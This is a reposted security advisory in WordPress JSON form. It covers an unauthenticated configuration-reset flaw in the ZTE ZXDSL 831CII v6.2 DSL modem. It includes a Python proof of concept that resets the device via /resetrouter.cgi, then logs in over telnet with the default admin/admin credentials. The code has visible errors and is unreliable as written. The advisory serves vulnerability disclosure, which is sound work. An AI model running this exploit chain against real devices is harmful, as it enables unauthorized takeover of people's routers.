{"id":10640,"date":"2017-11-28T14:19:02","date_gmt":"2017-11-28T22:19:02","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/28\/news-4412\/"},"modified":"2017-11-28T14:19:02","modified_gmt":"2017-11-28T22:19:02","slug":"news-4412","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/28\/news-4412\/","title":{"rendered":"SSD Advisory \u2013 ZTE ZXDSL Configuration Reset"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 28 Nov 2017 13:18:47 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3546\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3546');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. <\/p>\n<p>ZXDSL 831CII is &#8220;an ADSL access device to support multiple line modes. It supports ADSL2\/ADSL2+ and is backward compatible to ADSL, even offers auto-negotiation capability for different flavors (G.dmt, T1.413 Issue 2) according to central office DSLAM\u2019s settings (Digital Subscriber Line Access Multiplexer). It provides four 10\/100Base-T Ethernet interfaces at the user end. Utilizing the high-speed ADSL connection, the ZXDSL 831CII can provide users with broadband connectivity to the Internet.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> ZTE was informed of the vulnerability, their response was: &#8220;According to the related product team reply, the affected product 831CII V6.2 has already ended sales and is no longer maintained by ZTE in 2011.<\/p>\n<p>831CII V2.0, the substitute product of 831CII V6.2, has also already been out of the service in 2015.<\/p>\n<p>Right now, 831CII V2.0&#8217;s substitute product is ZXHN H108 V2.5.&#8221;<\/p>\n<p><span id=\"more-3546\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> User controlled input is not sufficiently sanitized and allows unauthenticated user to send a GET request to <em>\/resetrouter.cgi<\/em> with parameter <em>lanRefresh=0<\/em><\/p>\n<p>Successful exploitation of this vulnerability enables a remote unauthenticated user to restart the configuration of the device.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1de0d641e85598631310\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> # ZTE ZXDSL 831CIIV6.2 Remote Root Command Execution    import httplib  import sys  import telnetlib    #vulnerable host IP  HOST = raw_input(&#8220;Enter Host: &#8220;)    #IDOR to reset modem to default config  conn = httplib.HTTPConnection(HOST)  conn.request(&#8220;GET&#8221;,&#8221;\/resetrouter.cgi?lanRefresh=0&#8243;)  res = conn.geresponse()  print res.status, res.reason    user = &#8220;admin&#8221;  pass = &#8220;admin&#8221;    tn = telnetlib.Telnet(HOST)  tn.read_until(&#8220;login: &#8220;)  tn.write(user + &#8220;n&#8221;)  if password:  \ttn.read_until(&#8220;Password: &#8220;)  \ttn.write(password + &#8220;n&#8221;)    tn.write(&#8220;whoamin&#8221;)  tn.write(&#8220;exitn&#8221;)    print tn.read_all() <\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0019 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3546\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 28 Nov 2017 13:18:47 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. ZXDSL 831CII is &#8220;an ADSL access device to support multiple line modes. It supports ADSL2\/ADSL2+ and is backward compatible to ADSL, even offers auto-negotiation capability for different flavors (G.dmt, T1.413 Issue 2) according to central office DSLAM\u2019s settings &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3546\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 ZTE ZXDSL Configuration Reset<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[16780,10757,12136],"class_list":["post-10640","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-configuration-reset","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10640","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10640"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10640\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10640"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10640"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10640"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}